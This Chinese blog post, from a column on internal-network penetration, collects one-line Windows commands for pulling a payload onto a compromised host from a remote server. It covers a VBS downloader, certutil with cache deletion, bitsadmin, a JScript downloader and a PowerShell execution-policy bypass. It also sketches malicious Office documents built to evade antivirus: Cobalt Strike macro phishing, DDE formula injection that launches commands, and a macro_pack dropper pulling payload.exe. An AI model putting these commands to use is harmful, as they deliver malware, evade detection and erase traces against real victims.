内网payload下载及免杀文档制作

最新推荐文章于 2023-02-28 14:49:09 发布
最新推荐文章于 2023-02-28 14:49:09 发布
阅读量646 收藏 1
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43271194/article/details/110393462
版权

payload下载及免杀文档制作

payload下载

vbs

脚本如下,注意要放到一行里

支持windows全系列,但对https不友好

echo set a=createobject(^"adod^"+^"b.stream^"):set
w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >>downfile.vbs

在cmd里执行这个命令,将会生成一个vbs脚本

在这里插入图片描述

然后使用命令下载payload

cscript downfile.vbs http://192.168.95.128/1.txt C:\User\am0x\1.txt

报错如下

在这里插入图片描述

暂时没找到原因

好吧找到原因了,cmd权限不够

在这里插入图片描述

cerutil

使用方法

cmd运行下面命令

certutil -urlcache -split -f http://192.168.95.128/1.txt

成功下载

在这里插入图片描述

然后运行

certutil -urlcache -split -f http://192.168.95.128/1.txt delete

删除缓存记录

bitsadmin

用法

bitsadmin /rawreturn /transfer down http://192.168.95.128/1.txt C:\1.txt

下载成功

在这里插入图片描述

js

代码如下,保存为download.js,将下载后的文件保存为micropoor.exe(可自由修改)

var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);WinHttpReq.Send();BinStream = new ActiveXObject("ADODB.Stream");BinStream.Type = 1;BinStream.Open();BinStream.Write(WinHttpReq.ResponseBody);BinStream.SaveToFile("micropoor.exe");

使用

cscript /nologo download.js http://192.168.95.128/1.txt

成功

在这里插入图片描述

powshell

执行命令,同样得把命令弄成一行

powershell -exec bypass -C (new-object System.Net.WebClient ).DownloadFile( 'http://192.168.95.128/1.txt','C:\1.txt')

成功

在这里插入图片描述

免杀文档制作

  • 文档钓鱼,cs+宏攻击

  • DDE攻击

    • 当excel遇到+和-会自动填充=成为公式

      +thespnquisition(cmd|'/c calc.exe'!A

    • 若打开的外部应用为8字符,excel自动忽略后面的字符,如下面的两个作用相同

      =rundll32|'URL.dll,OpenURL calc.exe'!A
=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A

  • macro_pack

    echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -t DROPPER -G "drop.xls"
Amire0x
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
免杀Payload生成工具Veil的下载与使用
Goodric的博客
03-28 3623
免杀Payload生成工具Veil的下载与使用 Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件 ———— ———— 下载Veil kali 中输入指令 apt-get install veil 下载 veil(需要挺久) 下载可能会出现错误,我这里提示了可能解决问题的指令。其它问题无法下载也可能需要换软件源。 我这里页面显示这个,大概是说升级了libpam、libc、libssl等exe库,需要重新启动服务,就直接选Yes 了。
内网windows主机下载payload
zwish的信安之路
07-29 557
当获取到内网一台windows主机时,其不能上传shell,可以执行命令,这时候可以上传或者从我们的服务器上下载payload 1、vbs #首先先向windows写入一个vbs脚本 echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.resp
通过Python实现Payload分离免杀过程详解
09-16
主要介绍了通过Python实现Payload分离免杀过程详解,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
使用Python进行防病毒免杀解析
12-23
打造免杀payload成了一个很重要的话题,在这里,本文将介绍如何使用Pyhton轻松绕过防病毒软件。 0x01 环境准备 1、软件安装 Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi Py2...
第六十六课:借助aspx对payload进行分离免杀1
08-03
靶机背景:msf exploit(multi/handler) > set lhost 192.168.1.5msf exploit(multi/handler
通过随机异或和加密payload动态免杀所有php文件
最新发布
03-12
异或和是什么意思
一句话下载payload(持续更新)
god_Zeo的安全博客
04-24 1461
js一句话下载payload windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。 var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false); Wi...
正版payload_dumper
05-05
用法:将payload_dumper与payload.bin在一个文件夹下,然后执行设置可执行权限,然后执行./payload_dumper就能将payload.bin解压到当前目录中
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
payload_dumper.exe
08-22
CMD使用命令payload_dumper.exe --out 分解输出目录 payload.bin所在的目录 payload_dumper.exe --out out\ out\payload.bin
Payload_Dumber_x64.rar
06-15
Payload_Dumber_x64.rar
Payload_Dumber_x64.7z
10-14
一加刷机包payload.bin解包工具
转载:任意下载文件漏洞
qq_43907122的博客
02-28 525
edusrc--某985任意文件下载 00demons00 2023-02-26 20:28:24 文章来自于公众号:WK安全 欢迎大家多多支持 免责声明 由于传播、利用WK安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,WK安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢! 打开url:http://xxxxxxx/login 目测是一个RuoYi框架,根据以往的历史漏洞曝光,有以下这些: 1、shiro默认
Kali使用Metapsloit渗透win10 生成 payload 反弹shell
weixin_45908624的博客
07-19 2265
windows payload 反弹shell
命令行下载php文件,windows命令行下载文件
weixin_35878217的博客
03-13 407
前言在windows的环境下,dos窗口里有以下多个命令支持下载。笔者最常用的有powershell、vbs、certutil、bitadmin等命令。certutilcertutil -urlcache -split -f http://192.168.203.140/b.ps1bitsadminbitsadmin /transfer myDownLoadJob /download /prior...
Windows提权
赤赤三的博客
03-20 1051
Windows密码安全性测试: 本地管理员密码如何直接提取(能读取就直接读取,不能读取使用hash连接,实在不行就暴力破解): 直接通过mimikatz读取管理员密码: 使用Ophcrack破解系统Hash密码:https://ophcrack.sourceforge.io/tables.php 把这两个目录导入到kali自带工具里: 通过lazagne工具提取密码: 读取本地计算机所有密码 ...
MSF下载payload
08-18
您可以在Metasploit Framework (MSF) 中使用以下命令来下载一个payload: 1. 首先,打开终端并启动MSF控制台: ``` msfconsole ``` 2. 接下来,选择一个合适的exploit模块,比如使用`exploit/windows/smb/ms17_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值